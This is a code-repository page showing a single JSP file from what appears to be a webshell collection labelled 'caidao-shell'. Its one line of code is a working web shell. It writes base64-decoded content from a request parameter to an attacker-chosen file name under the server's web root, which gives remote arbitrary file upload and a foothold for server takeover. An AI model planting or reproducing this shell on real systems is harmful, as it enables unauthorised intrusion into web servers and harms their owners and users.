webshell/caidao-shell/w02.jsp

2 lines
183 B
Text
Raw Normal View History

2016-05-29 01:27:34 +00:00
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>